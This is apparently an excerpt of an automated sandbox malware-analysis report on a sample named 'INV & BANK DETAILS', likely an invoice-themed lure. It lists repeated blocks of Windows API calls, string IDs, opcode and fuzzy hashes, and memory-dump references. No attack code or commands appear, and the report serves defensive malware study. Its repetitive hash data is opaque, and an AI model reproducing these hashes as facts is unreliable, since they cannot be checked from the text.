                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                • API String ID: 847901565-1698111956
                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                APIs
                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$Window
                                • String ID: SysMonthCal32
                                • API String ID: 2326795674-1439706946
                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DestroyWindow
                                • String ID: msctls_updown32
                                • API String ID: 3375834691-2298589950
                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: $<
                                • API String ID: 4104443479-428540627
                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID: \VH
                                • API String ID: 1682464887-234962358
                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID: \VH
                                • API String ID: 1682464887-234962358
                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID: \VH
                                • API String ID: 1682464887-234962358
                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume
                                • String ID: \VH
                                • API String ID: 2507767853-234962358
                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$InformationVolume
                                • String ID: \VH
                                • API String ID: 2507767853-234962358
                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                • API String ID: 3850602802-1010561917
                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                • String ID: crts
                                • API String ID: 943502515-3724388283
                                • Opcode ID: 08af2f095981145846b9209207a54205310ea625501f8091d59343c9a61b7938
                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                • Opcode Fuzzy Hash: 08af2f095981145846b9209207a54205310ea625501f8091d59343c9a61b7938
                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$LabelVolume
                                • String ID: \VH
                                • API String ID: 2006950084-234962358
                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • GetMenuItemInfoW.USER32 ref: 00449727
                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                • DrawMenuBar.USER32 ref: 00449761
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$InfoItem$Draw_malloc
                                • String ID: 0
                                • API String ID: 772068139-4108050209
                                • Opcode ID: f3881f9784b5deeb24e105df658f2c36b9320f957bca43c298b9856599369fa4
                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                • Opcode Fuzzy Hash: f3881f9784b5deeb24e105df658f2c36b9320f957bca43c298b9856599369fa4
                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$_wcscpy
                                • String ID: 3, 3, 8, 1
                                • API String ID: 3469035223-357260408
                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                APIs
                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: ICMP.DLL$IcmpCloseHandle
                                • API String ID: 2574300362-3530519716
                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                APIs
                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: ICMP.DLL$IcmpCreateFile
                                • API String ID: 2574300362-275556492
                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                APIs
                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: ICMP.DLL$IcmpSendEcho
                                • API String ID: 2574300362-58917771
                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
